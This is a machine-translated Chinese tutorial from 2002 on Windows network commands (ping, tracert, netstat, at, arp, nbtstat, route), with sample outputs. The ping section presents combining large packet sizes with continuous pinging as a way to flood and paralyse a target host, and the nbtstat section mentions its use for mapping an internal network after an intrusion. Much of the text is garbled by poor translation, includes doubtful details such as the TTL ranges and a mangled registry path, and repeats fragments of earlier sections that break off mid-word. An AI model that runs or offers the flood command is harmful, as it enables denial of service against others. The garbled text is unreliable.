Network basic command

xiaoxiao2021-03-05 21

The basic theme of the network command: Tiger Theme Author: Tiger

============================================================================================================================================================================================================= ======== Title: Network Basic Command Date: 2002-11-09 Content:

PING I. Basics: One of the most useful commands in the ping-tcp / IP protocol gives another system to send a series of packets. The system itself sends a response again. This utility is useful for finding the remote host. The result it returned to indicate whether the host can reach the host, how long it takes a host to return a packet. Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i ttl] [-V TOS] [-r count] [-s count] [[-j host -List] [-k host-list]] [-w Timeout] destination-list options: -t ping the specifed host uncle interrupted. (unless people are aborting) -A resolve address to hostnames. (parsing computer). NetBIOS Name) - N Count Number of Echo Requests TO Send. (Send count specified by the ECHO packet, the default value is 4) -l size send buffer size. (Send the specified amount of Echo packet. Default is 32 words The maximum is 65, 527) -f set don't fragment flag in packet. (Send "in packet" Do not segment "logo) -i TTL TIME TO LIVE. (Time to stay in the other party) -V TOS Type of Service. (Service Type) -r Count Record Route for Count HOPS. (In the Record Routing "field records the path passed by the route jump point.count can specify at least 1 set, up to 9 computers) -s count timestamp For count hops. Cache time of record routing points) -j host-list loose source route along host-list. (Using Computer-List Spectrims Routing Packet. Continuous Computer can be separated by intermediate gateway (routing sparse Source) IP Allowed Maximum Number 9) --k Host-List Strict Source Route Along Host-List. (Using Computer-List Specimble Routing Packet. Continuous Computer cannot be separated by intermediate gateway (routing strict source) IP allows The maximum number of 9) -w Timeout Timeout In Milliseconds to wait for Each Reply. (Specify time separation, unit is milliseconds) destination-list (specified Ping's Remote Computer) In fact, this command is mainly used to see the speed of the other party, if it is the result that ping gets the request time OUT. It's afraid that you don't have to go to this host at all, it is not within your range.

Second. Use example - T: non-stop .......... until you press CTRL-C. This feature has no special skill, but it can be used with other parameters, no instance. -a: c: \> ping -a 218.19.49.213 pinging sjj [218.19.49.213] with 32 bytes of data: [I am sending 32-bytes) to: 218.19.49.213] reply from 218.19.49.213: Bytes = 32 TIME = 60ms TTL = 116 [Correct arrival / size 32 bytes / consumption time 62MS / stay time] reply from 218.19.49.213: Bytes = 32 TIME = 60ms TTL = 116 reply from 218.19.49.213: Bytes = 32 TIME = 60ms TTL = 116 reply from 218.19.49.213: BYtes = 32 TIME = 60ms TTL = 116 ping statistics for 218.19.49.213: 【Data Statistics】 Packets: Sent = 4, Received = 4, Lost = 0 (0% Loss), Approximate Round Trip Times In Milli-Seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms From above you can know the computer NetBIOS named SJJ for IP 218.19.49.213.

-n Generally, only four packets are generally sent. With this command, you can define the number of senders, which is very helpful to measure the network speed. For example, I want to test the average time of returning to send 50 packets. How much, how much is the fastest time, how much the slowest time can be learned: C: \> ping -n 50 218.19.49.213

Pinging 218.19.49.213 with 32 bytes of data:

Reply from 218.19.49.213: bytes = 32 time = 71ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 50ms TTL = 116 Reply from 218.19.49.213 : bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 50ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 61ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213 : bytes = 32 time = 50ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 reply from 218.19.49.213: Bytes = 32 TIME = 50ms TTL = 116 reply from 218.19.49.213: Bytes = 32 TIME = 50ms T TL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 50ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 50ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 TIME = 60ms TTL = 116 reply from 218.19.49.213: Bytes = 32 TIME = 60ms TTL =

116 Reply from 218.19.49.213: bytes = 32 time = 61ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 50ms TTL = 116 Reply from 218.19. 49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 50ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 50ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 61ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 50ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19. 49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 50ms TTL = 116 Reply from 218.19.49.213: bytes = 32 Time = 50ms TTL = 116 reply from 218.19.49.213: Bytes = 32 Time = 60ms TTL = 116 reply from 218.19.49.213: Bytes = 32 TIME = 61 ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116 Reply from 218.19.49.213: bytes = 32 time = 60ms TTL = 116Ping statistics for 218.19.49.213: Packets: Sent = 50, Received = 50, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 50ms, maximum = 71ms, average = 57ms

From the above, I can know that in the process of sending 50 packets from 218.19.49.213, it returns 50, and the 50 packets return speed is 50ms, the speed is 71ms, the average speed is 57ms. -l In the default, the packet size sent by Windows is 32byte, we can also define its size, but there is a size limit, that is, the maximum can only send 65500byte, maybe someone will ask why you want to limit 65500Byt Because the system of the Windows series has a security vulnerability (perhaps other systems) is that the other party is greater than or equal to 65532, the other party is very likely to block, so Microsoft has solved this security hole. Then limit the packet size of the PING. Although Microsoft has made this limit, this parameter is still very powerful after the other parameters. For example, we can achieve an aggressive command by mating the -t parameter (network storm, can not be used easily). C: /) ping -l aaaaa -t xxx.xxx.xxx.xxx This will send the size of the aaaaabyte to the xxx.xxx.xxx.xxx computer, if you only have a computer, there is no Effect, but if there are many computers, you can make the other party completely paralyzed, the network is severely blocked, the HTTP and FTP services are completely stopped, whereby power is not as small.

-f The packets you send will be sent to each other through routing segmentation, and the route will not be resilient after the route is added. -i is used to help you check the network operation. -r In general, the packet you sent is to the other party through a route, but what is the route? Through this parameter, you can set the number of routes you want to detect, but the limit is 9, that is, you can only track 9 routes. If you want to detect more, you can implement it through other commands, I will Explain to everyone in future articles. The following is an example:

C: \> ping -n 1 -r 9 218.19.49.213 (send a packet, record up to 9 routes)

Pinging 218.19.49.213 with 32 bytes of data:

TIME = 80ms TTL = 116 -> 61.187.255. -> 61.144.0.53 -> 61.144.0.65

Ping statistics for 218.19.49.213: Packets: Sent = 1, Received = 1, Lost = 0 (0% LOSS), Approximate Round Trip Times in Milli-Seconds: minimum = 80ms, Maximum = 80ms, Average = 80ms from above You can know that from my computer to 218.19.49.213, a total of these routes.

-s This parameter is similar to -R, but this parameter does not record the route passed by the packet, and only 4 are recorded.

-j uses computer-list to rout the packet. A continuous computer can be separated by the intermediate gateway (routing sparse source) IP allowed to be 9.

-k The computer list specified by Computer-List routing packets. Continuous computers cannot be separated by intermediate gateway (routing strict source) IP allowed to 9. -w This parameter has no other techniques.

Other Tips for ping commands: 1. In general, you can also return the other party to your TTL value size. The system type of the Rough judgment target host is a Windows series or a UNIX / Linux series, in general, Windows series The TTL value returned by the system is between 100-130, and the TTL value returned by the UNIX / Linux series is between 240-255. Of course, the value of TTL can be modified in the other party, and the system of Windows series can pass Modify the following key value: [HKEY_LOCAL_MACHINE \System\currentControlset\Services\currentControlset\ Services] "defaultttl" = dword: 000000FF 255 --- FF 128 --- 80 64 ---- 40 32 ---- 20 2. Typical order of network failure through ping

Normally, when you use the ping command to find the problem or verify the network operation, you need to use many ping commands, if all are running correctly, you can believe that the basic connectivity and configuration parameters are no problem; if some The ping command runs a fault, which can also indicate where to find the problem. A typical detection order and corresponding possible faults are given below:

Ping 127.0.0.1 - This ping command is sent to the IP software of the local computer, which never exits the computer. If this does not do this, it means that there is some most basic issues for the installation or running of TCP / IP.

Ping LAN Other IPs - This command should leave your computer, reach other computers through the NIC and network cable, return. Received a return response indicates that the NIC and the carrier in the local network operate correctly. But if you receive 0 feedback answers, then the subnet mask (when subnet split, the network part of the IP address and the host part) is incorrect or the network card configuration error or the cable system has problems.

Ping Gateway IP - This command If the answer is correct, it indicates that the gateway router in the LAN is running and can make a response.

Ping Remote IP - If you receive 4 answers, the default gateway is used to successfully use. For dial-up users, they represent the accessible Internet (but do not rule out the ISP DNS).

Ping localhost - localhost is a network reserved name of an operating system. It is an alias of 127.0.0.1, and each computer should be able to convert the name into this address. If there is no such band, there is a problem in the host file (/ windows / host).

-s This parameter is similar to -R, but this parameter does not record the route passed by the packet, and only 4 are recorded.

-j uses computer-list to rout the packet. A continuous computer can be separated by the intermediate gateway (routing sparse source) IP allowed to be 9.

-k The computer list specified by Computer-List routing packets. Continuous computers cannot be separated by intermediate gateway (routing strict source) IP allowed to 9.

-w This parameter has no other techniques.

Ping Native IP - This command is sent to the IP address configured by your computer, and your computer should have a response to the ping command. If not, there is a problem with the local configuration or installation. This issue occurs, LAN users disconnect the network cable and resend the command. If the network is turned off, this command is correct, then another computer may have the same IP address. Ping LAN Other IPs - This command should leave your computer, reach other computers through the NIC and network cable, return. Received a return response indicates that the NIC and the carrier in the local network operate correctly. But if you receive 0 feedback answers, then the subnet mask (when subnet split, the network part of the IP address and the host part) is incorrect or the network card configuration error or the cable system has problems.

Ping Gateway IP - This command If the answer is correct, it indicates that the gateway router in the LAN is running and can make a response.

Ping Remote IP - If you receive 4 answers, the default gateway is used to successfully use. For dial-up users, they represent the accessible Internet (but do not rule out the ISP DNS).

Ping http://www.yahoo.com/-- Execute the ping command for this domain, your computer must first convert the domain name into an IP address, usually through the DNS server. If there is a failure here, the IP address of the DNS server is not correct or the DNS server is faulty. By the way: You can also use this command to implement the switching function of the domain name on the IP address. If all the ping commands listed above can run normally, then you can rest assured that you can make local and remote communications on your computer. However, the success of these commands does not mean that there is no problem with all your network configurations, for example, some subnet mask errors may not use these ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------- author: tiger date: 2002-11-09 content : Tracert 1, Basic Knowledge Tracert: is a utility that verifies to the remote host path USAGE: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

Options: -d uses parameter -D, which can specify the program when the program is tracked, and also parses the domain name of the target host. -h maximum_hops maximum number of hops to search for target. (Specify the maximum number of hops search) -j host-list loose source route along host-list. (Follow the address in the host list) -w Timeout Wait Timeout Milliseconds for Each Reply. (Specify time time interval, program default time unit is MS) Main functions: Determination of the path to the packet to the host, display the number of relay nodes passing through the data package and arrival time. II. Example 1. If we want to know the detailed transmission path information between its computer and the target computer http://www.adsl4u.net/. Type in the DOS prompt:

C: /> tracert http://www.adsl4u.net/

Tracing route to http://www.adsl4u.net/ [211.154.211.3] Over a Maximum of 30 HOPS: 1 50 ms 40 ms 50 ms 61.187.71.219 2 40 ms 40 ms 50 ms 61.187.70.41 3 40 ms 40 ms 50 ms 61.187.134.254 4 40 ms 40 ms 50 ms 61.187.255.81 5 40 ms 41 ms 50 ms 61.187.255.70 6 50 ms 50 ms 50 ms P-4-0-r1-c-gdgz 1.cn.net [ 202.97.40.101] 7 80 MS 80 MS 80 MS 202.97.38.162 880 MS 80 MS 81 MS 202.96.12.38 9 80 MS 80 MS 80 MS 202.106.192.158 10 81 MS 80 MS 80 MS 202.96.13.134 11 81 MS 80 MS 80 MS 211.154.209.26 12 80 MS 80 MS 80 MS 211.154.211.3

TRACE COMPLETE.

From the above process we can return a list of relay stations experienced before the implementation of the execution result, and display the time of each relay station. This feature is similar to the ping command, but what it sees is more detailed than the ping command, it will give you a request package you sent to a certain site, and all the routings taken will tell you, and through the route IP How much, how much is it through the IP? Through these times, we can easily find out where the user between the user's host and the target website is out.

If we add some parameters after the tracert command, we can also detect other more detailed information, (here, do not make a detailed instance), EG: Use parameter -D, you can specify the program when tracking the path information of the host, also parsing Domain name of the target host -------------------------------------------------------------------------------------------------------------------- ------------ author: tiger date: 2002-11-09 content: netstat a basic knowledge of netstat:. observation network utility network connection status netstat command displays currently active network connections Details, such as the statistics of the Ethernet, display all protocols, including TCP protocols, UDP protocols, and IP protocols, routing tables and network interface information, allow users to know what new network connects currently running. Online, you can see tools such as X-NetStat, nothing more than its interface is a Win interface, which is more intuitive, and its feature is almost the same. USAGE: Displays Protocol Statistics and Current TCP / IP Network Connections .. (Display Protocol and Current Network Connection)

NetStat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-A Displays All Connections and Listening Ports. (Show all connection and listening ports) -e displays ethernet statistics. this may be combined with the -s Option. (Show Ethernet statistics, can be used with -s) -N displays Addresses and Port Numbers in Numerical Form. (Display address and port number in digital table) -p proto shows connection; proto ,,,,,,,,,,,,, Statistics, Proto May BE TCP, UDP, OR IP. (Displays the connection to protocol specified by protocol; Protocol can be TCP or UDP. If you use the -s option to display the statistics of each protocol, Protocol can be TCP, UDP, ICMP or IP) -r displays the routing table. (Display Routing Table Information) -s Displays Per-Protocol Statistics. by Default, Statistics Are Shown for TCP, UDP and IP; The -p Option May BE Used To Specify A Subset (Show statistics for each protocol. By default, the statistics of TCP, UDP, ICMP, and IP are displayed. -P options can be used to specify the default subset) Interval Redisplays Selected Statistics, Pausing Interval Seconds Between Each Display. Press Ctrl C to Stop Redisplaying Statistics. (Re-displays the selected statistics, suspend Interval between each display second. Stop statistics by Ctrl C stop. If this parameter is omitted, NetStat will print a current configuration information) II. Instance 1. View the current network connection status C: /> NetStat / A

Active Connections (port type) (Local address) (external address) (state) Proto Local Address Foreign Address State TCP adsl1688: telnet adsl1688: 0 LISTENING [Port Type TCP port Telnet listening state] TCP adsl1688: epmap adsl1688: 0 LISTENING TCP adsl1688 : Microsoft-DS ADSL1688: 0 listening TCP ADSL1688: 1025 ADSL1688: 0 listening TCP ADSL1688: 1027 ADSL1688: 0 listenging [port type TCP port 1027 listening status]

TCP ADSL1688: 1131 ADSL1688: 0 listening ............................................ udp adsl1688: EPMAP *: * UDP ADSL1688: Microsoft-DS *: * UDP ADSL1688: 1026 *: * [Port Type UDP port 1026] ............................................ Use this parameter to clearly display all ports of your computer currently open, including TCP ports and UDP ports. We can use this parameter frequently to see if the computer's system service is normal, is it "hacker" left the back door, Trojan, etc. I think we should have such a habit. After I just installed the system, I will run netstat -a to see what port is open, and record it, so that I will use it as a reference, when I found an unknown port You can make a countermeasures in time. Because this parameter also shows the current computer that IP is connected to your server, so it is also a real-time intrusion detection tool. If you find that there is an ip connected to an abnormal port, you can also make effective in time. Countermeasures. C: /> netstat -n -a

Active Connections [Event connection]

TCP 192.168.0.1:139 0.0.0.0:0 LISTENING ...... TCP 218.76.6.122:139 0.0.0.0:0 LISTENING TCP 218.76.6.122:3038 61.186.175.113:2887 ESTABLISHED [now can clearly see the IP address and port Name] udp 0.0.0.0:135 *: * ............................................. 2. View Ethernet Statistics C: /> NetStat -E -A Interface Statistics (Communication Data Statistics)

Received [received] SENT [send]

Bytes 4054478 7804 6158 Non-Unicast Packets 283 286 Discards 0 0 Errors 0 0 Unknown Protocols [Unknown Protocol] 1564 3. View Routing Information

C: /> NetStat -R

Route Table [Routing Table] =============================================== ============================================3] ....................................... ... ================================================= ========================== Active routes: [Activity Routing] Network Destination [Host] Netmask [Subnet Mask] Gateway [Gateway] Interface [Interface] METRIC [Number of hops "(About the geometric distance, we use it to define the distance between the two router (or COST), calculate the calculation formula 10 8 / speed (BPS) That is, the larger the bandwidth, the smaller the line line, the smaller the distance. Thank you, the teacher Neekol's teachings) ............................................................................................ Default Gateway : [Default gateway] 218.76.6.122 ======================================== =========================================== ======================================================================================================================================================================================

TCP ADSL1688: 1131 A ------------------------------------------------------------------------------------------------------------------------------------------------------------------ ------------- author: tiger date: 2002-11-09 content: AT

The front mentioned several network detection analysis tools, IP detection tools, network statistics tool NetStat, tracking routing tools Tracert, one more interesting network command. When I talk about it, I have to mention that the Ping Plotter is tracking software (huh, hinge), which encompasses all the functions of the three network commands above, and provides both data and graphical expression, making it detection analysis. The result is more intuitive and easy to understand. The specific PING PLOTTER downloads and uses you can learn from yourself. Easy, then come back. In fact, the following online command is ideal is that the NET Start in the NET command is better, just mention it. USAGE: AT command schedules run commands and programs at a specific date and time. To use the AT command, the plan service must have been running. AT [// computername] [[ID] [/ delete] | / delete [/ yes] at [// computename] TIME [/ Interactive] [/ every: date [, ...] | / next: Date [, ...] "Command"

// computername Specifies the remote computer. If this parameter is omitted, the command is run on the local computer. ID specifies the identification number to the planned command. / delete deletes a planned command. If the ID is omitted, all scheduled commands on your computer will be deleted. / YES does not need further confirmation, use the command to delete all jobs. Time specifies the time of running the command. / Interactive allows the job to interact with the user desktop logged in at the time. / Every: Date [, ...] runs a command every month or each week. If the date is omitted, the default is to run on this day. / next: Date [, ...] specifies that the command is run in the next specified date (eg, next Thursday). If the date is omitted, the default is to run on this day. "Command" is ready to run Windows NT commands or batch programs.

II. Example 1. Establish a new task (first soil, after Net Start ............) C: /> at 23:00 Start C: /> AT 23:00 START C: / Courage. MP3 added a job, its job ID = 1 [ Now we have established a task to automatically play "courage" songs in 23.00 system.

2. View the task (Schedule)

C: /> AT [View Has Task] Status ID Date Time Command Line ----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------- 1 Today, 23:00 PM Start C: / Courage. MP3 3. Delete this command C: /> AT 1 / Delete [Delete No. 1 Task] C : /> AT [At this point, the empty] The list is empty.

The command of the AT can only be used in 2000

Edited by - Tiger recovered in 2002-11-09 18:03:24 ------------------------------- ------------------------- author: tiger date: 2002-11-09 content: ARP a basic knowledge ARP is an important TCP / IP The protocol, and is used to determine the network card physical address corresponding to the IP address. The use of the ARP command enables you to view the current content in the ARP cache of the local computer or another computer. In addition, using the ARP command, you can also use the static network card physical / IP address in manual way, you might use this way for the default gateway and local servers, help to reduce information on the network. the amount. According to the default setting, the project in the ARP cache is dynamic. Whenever a data report for a specified location is sent, the ARP will automatically add the item when there is no current project in the cache. Once the cache project is entered, they have begun to go to the failure state. Therefore, if the project is rare or at all in the ARP cache, please don't be strange, you can add it through another computer or router's PING command. So, when you need to view the contents of the cache via the ARP command, please take the computer first PIN (you can't send the ping command). USAGE: Displays and Modifies The IP-to-Physical Address Translation Tables Used by Address Resolution Protocol (ARP). (Show and Modify "Address Resolution Protocol" (ARP) to Ethernet IP or physical address translation table) ARP -S inet_addr eth_addr [if_addr] arp -d inet_addr [if_addr] arp -a [inet_addr] [-n if_addr]

-a Displays current ARP entries by interrogating the current protocol data. If inet_addr is specified, the IP and Physical addresses for only the specified computer are displayed. If more than one network interface uses ARP, entries for each ARP table are displayed. (By Ask the TCP / IP to display the current ARP item. If INET_ADDR is specified, only the IP and physical address of the specified computer) -g Same as -a. (Same as -A) INET_ADDR Specifies An Internet Address. (To add some decimal tag) specify the IP address) -N if_addr displays the ARP entries for the network interface specified by if_addr. (display specified by if_addr network interface ARP entries) -d Deletes the host specified by inet_addr. inet_addr may be wildcarded with * to delete all hosts. (remove items specified by inet_addr) -s Adds the host and associates the Internet address inet_addr with the Physical address eth_addr. the Physical address is given as 6 hexadecimal bytes separated by hyphens. the entry is permanent. (add entries in the ARP cache Associate the IP address INET_ADDR and physical address Ether_addr. The physical address is given by 6 hexadecimal bytes separated by a hyphen. Specify an IP address using a decimal decimal tag. The item is permanent, that is, timeout Rear item Automatic Automation from Cache Delete) Eth_addr Specifies A Physical Address. (Specify Physical address) if_addr If present, this specifies the Internet address of the interface whose address translation table should be modified.If not present, the first applicable interface will be used .. (specify the address conversion table need to modify their interface IP address (if Yes). If there is no existence, the first applicable interface will be used) Second, instance Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp.

C: /> ping 192.168.0.10

Pinging 192.168.0.10 with 32 bytes of data:

Reply from 192.168.0.10: bytes = 32 TIME <10ms TTL = 128 reply from 192.168.0.10: bytes = 32 TIME <10ms TTL = 128 reply from 192.168.0.10: BYtes = 32 TIME <10MS TTL = 128 reply from 192.168.0.10 : bytes = 32 TIME <10ms TTL = 128PING Statistics for 192.168.0.10: Packets: SENT = 4, Received = 4, Lost = 0 (0% Loss), Approximate Round Trip Times in Milli-Seconds: minimum = 0ms, Maximum = 0ms, average = 0ms

C: /> ARP -A [View all items in the cache]

Interface: 192.168.0.65 on Interface 0x2 Internet Address Physical Address Type 192.168.0.10 00-00-00-11-22-33 Dynamic 192.168.0.68-80-C8-AD-D2-CD Dynamic 192.168.0.255 12-50- BA-00-22-98 Dynamic

C: /> ARP -S 192.168.0.10 00-00-00-11-22-33 [Manually enter a static item in the ARP cache]

Interface: 192.168.0.65 on Interface 0x02 Internet Address Physical Address Type 192.168.0.10 00-00-00-11-22-33 static [static] 192.168.0.68-80-c8-ad-d2-cd Dynamic [dynamic 】 192.168.0.255 12-50-ba-00-22-98 Dynamic

C: /> ARP -D 192.168.0.10

C: /> arp -a interface: 192.168.0.65 on interface 0x02 Internet address Physical Address Type 192.168.0.68-80-c8-ad-d2-cd Dynamic 192.168.0.255 12-50-BA-00-22-98 Dynamic

This command uses http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10207/79487.html

_addr. The Physical Address IS Given As 6 Hexadecimal Bytes Separated By Hyphens. The entry is permanent. (Add IP address INET_ADDR and physical address ether_addr, the physical address is divided by 6 sixteens separated by a hyphen Billing bytes. Use a decimal decimal tag to specify an IP address. The item is permanent, that is, automatically delete the cache deletion after the timeout expiration) Eth_addr specifies a Physical Address. (Specify physical address) if_addr if present, THIS SPECIFIESTITITIED THESSTER SPECIFACE INTERNET TRANSLATION TABLE SHOULD BE Modified.if Not Present, The First Applicable Interface Will BE Used .. (specifies that you need to modify the IP address of your address conversion table interface (if any). If not Existence, the first applicable interface will be used) Second, instance Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp.

C: /> ping 192.168.0.10 ------------------------------------------ ---------------- author: tiger date: 2002-11-09 content: nBTSTAT a basic knowledge netstat and nbtstat can say that the network detection tool (nETSTAT command is Windows: Subsystems for querying a type of information; nbtstat commands: Used to see the current NetBIOS-based TCP / IP connection status), you need to use after the TCP / IP protocol is installed. USAGE: Displays Protocol Statistics and current TCP / IP Connections Using NBT (NetBIOS over TCP / IP). (Diagnostic Command Using NBT (NetBIOS on TCP / IP) Display Protocol Statistics and Current TCP / IP Connection)

NBTSTAT [[-A Remotename] [-A ip address] [-c] [-n] [-r] [-r] [-r] [-s] [-s] [interval]]

-A (Adapter Status) Lists The Remote Machine's Name Table Given ITS Name lists its name table) -A (Adapter Status) Lists the Remote Machine's Name Table Given ITS IP Address. (using the IP of the remote computer) The address is listed in the name list (which is not large, -a already includes this feature)) -c (cache) Lists NBT's Cache of Remote [Machine] Names and their IP address [gives the IP address of each name The contents of the NetBIOS name cache) - N (Names) Lists Local NetBIOS Names. (Local NetBIOS Name) -r (Resolved) Lists Names Resolved by Broadcast and Via Wins (To resolve and register with the registration by broadcast or WINS) ) -R (reload) PurgeS and reloads the Remote Cache name Table (clerocated all the names in the NetBIOS Name Cache), reload the lmhosts file (this parameter is to clear the IP cache in the cache you can see by NetStat -c)))) -S (sessions) Lists SESSIONS TABLE WITH THE DESTINATION IP Addresses (Display client and server session listing remote computer) -s (sessions) Lists sessions Table Converting Destination IP Addresses to Computer NetBIOS Names. End and server session. Try to convert remote computer IP addresses into the name of the host file (this parameter and -s are almost the same, just this will give the other party's NetBIOS name))) -r (ReleaseRefresh) Sends name Release Packets to Wins And the NetBIOS name registered on the WINS server, then refresh their registration) RemoteName Remote host machine name. IP address Dotted decimal representation of the IP address. Interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl C to stop redisplaying statistics. (Re-display the selected statistics, pausing between each display Interval seconds. Press CTRL C to stop rescan statistics. If this parameter is omitted, NBTSTAT prints a current configuration information)

Second, Example 1. View connection status C: /> nbtstat -a adsl1688

Local connection 3: Node ipaddress: [218.76.4.35] Scope ID: []

Netbios Remote Machine Name Table

Name Type Status -------------------------------------------- ADSL1688 < 00> UNIQUE registered workgroup <00> Group registered Workgroup <1e> Group registered adsl1688 <20> unique registered ............................ mac address = 44-45-53-54-77-77

Local connection: Node ipaddress: [192.168.0.65] Scope ID: []

Netbios Remote Machine Name Table

Name Type Status -------------------------------------------- ADSL1688 < 00> UNIQUE Registered WORKGROUP <00> GROUP Registered WORKGROUP <1E> GROUP Registered ADSL1688 <20> UNIQUE Registered WORKGROUP <1D> UNIQUE Registered LIUQUch <03> GROUP Registered ADSL1688 <03> UNIQUE Registered

Mac address = 00-07-53-00-4e-b7 You can know that my computer's current computer's NetBIOS is named ADSL1688 is within the Workgroup domain, and there is currently liuquch landing on this computer, huh, all come out. This parameter can also be NBTSTAT -A 192.168.0.65, the display result is the same as the above.

2. List the cache content C: /> nbtstat -c

Local connection 3: Node ipaddress: [218.76.4.35] Scope ID: []

No names in cache

Local connection: Node ipaddress: [192.168.0.65] Scope ID: []

Netbios Remote Cache Name Table

Name Type Host Address Life [SEC] -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------ Workgroup <20> UNIQUE 192.168.0.68 5597 You can know the NetBIOS that you just have just just a computer that is 192.168.0.68. Oh, I have to mention, this command is provided to "hacker" in invading a favorable clue to the internal network after invading the opponent's host.

3. Display connection conversation content C: \> NBTSTAT -S Local connection 3: Node ipaddress: [218.76.4.35] scope ID: []

NetBIOS Connection Table

Local name State In / Out Remote Host Input Output

-------------------------------------------------- ----------------------------

ADSL1688 <03> Listening

Local connection: Node ipaddress: [192.168.0.65] Scope ID: []

NetBIOS Connection Table

Local name State In / Out Remote Host Input Output

-------------------------------------------------- -------------------------- ADSL1688 <00> Connected Out 192.168.0.10 4MB 125KB ADSL1688 <03> Listening Liuquch <03> listening ......... .........................

From the above, the computer is now changing with 192.168.0.68 to see if the file is replicated, and is replicated from the other party to your computer. (Note The above display data is changed, in case of case, or be careful).

E ipaddress: [192.168.0.65] scope ID: []

Netbios Remote Machine Name Table

2. List the cache content C: /> nbtstat -c

Local connection 3: Node ipaddress: [218.76.4.35] Scope ID: []

No names in cache

Local connection: Node ipaddress: [192.168.0.65] Scope ID: []

Netbios Remote Cache Name Table

3. Display connection conversation content C: \> NBTSTAT -S Local connection 3: Node ipaddress: [218.76.4.35] scope ID: []

NetBIOS Connection Table

Local name State In / Out Remote Host Input Output

-------------------------------------------------- ----------------------------

ADSL1688 <03> Listening

Local connection: Node ipaddress: [192.168.0.65] Scope ID: []

NetBIOS Connection Table

Local name State In / Out Remote Host Input Output ---------------------------------------- ------------------------------------

AD ------------------------------------- --------- author: tiger date: 2002-11-09 content:. rOUTE a basic knowledge route is used to display, add and modify routing tables of artificial project. We know that we are surfing on the Internet, not directly communicating with the host we have to access, but to pass a lot of routers. When we use the ping command to see it. Let's raise that example, such as we have to access Sina.com, which is transferred to our local machine, but in fact it can also choose other paths to us, just because the router has selection The minimum path is the ability to go now, now, if we have found a other host, let it come up from the road of broiler, we can use the route command to modify the routing table project, let it designate The path came over. (Wrong is too bad, early to a better instruction, and don't want to delete this paragraph, leave it) Most hosts are generally residing on a network segment connected to only one router. Since there is only one router, there is no problem that uses which router to publish the datagram to the remote computer, the IP address of the router can be entered as the default gateway of all computers on the network segment. However, when there are two or more routers on the network, you don't have to rely on the default gateway. In fact, you may want to pass some of the remote IP addresses through a particular router, while other remote IPs are passed through another router. In this case, you need the corresponding routing information, which is stored in the routing table, each host and each router is equipped with its own unique routing table. Most routers use specialized routing protocols to exchange and dynamically update the routing table between the routers. However, in some cases, it must be manually added to the router and the routing table on the host. Route is used to display, manually add and modify routing table items.

Usage: route [-f] [-p] [command [destination] [mask netmask] [Gateway] [metric metric] [m interface] -f clears the routing tables of all gateway entries.if this is buy in conjunction with one ONE Of The Commands, The Tables Are Cleared Prior To Running The Command. (Clear the routing table of all gateway portals. If this parameter is used in combination with a command, the routing table will be cleared before running the command) -pwhen used with the add command , makes a route persistent across boots of the system. By default, routes are not preserved when the system is restarted. Ignored for all other commands, which always affect the appropriate persistent routes. this option is not supported in Windows 95. (this parameter When used with the add command, the route is lasting between the system boot program. By default, the system does not retain the route. When used with the print command, display the registered persistent route list. Ignore all other total It is a command that affects the corresponding persistent route. This option is not supported under win95) Command One of these: Print Prints A Route (Printing Routing) delete deletes A Route (Delete Routing) Change Modifies An EXISTING ROSTING ROUTE (Modify the existing route) destination specifies the host. (Specify Host) Mask Specifies That The next Parameter Is The 'Netmask' Value. Netmask Specifies A Subnet Mask Value for Thi S Route Entry.if Not Specified, IT Defaults to 255.255.255.255. (Specify the subnet mask associated with the route entry. If not specified, use 255.255.255.255) 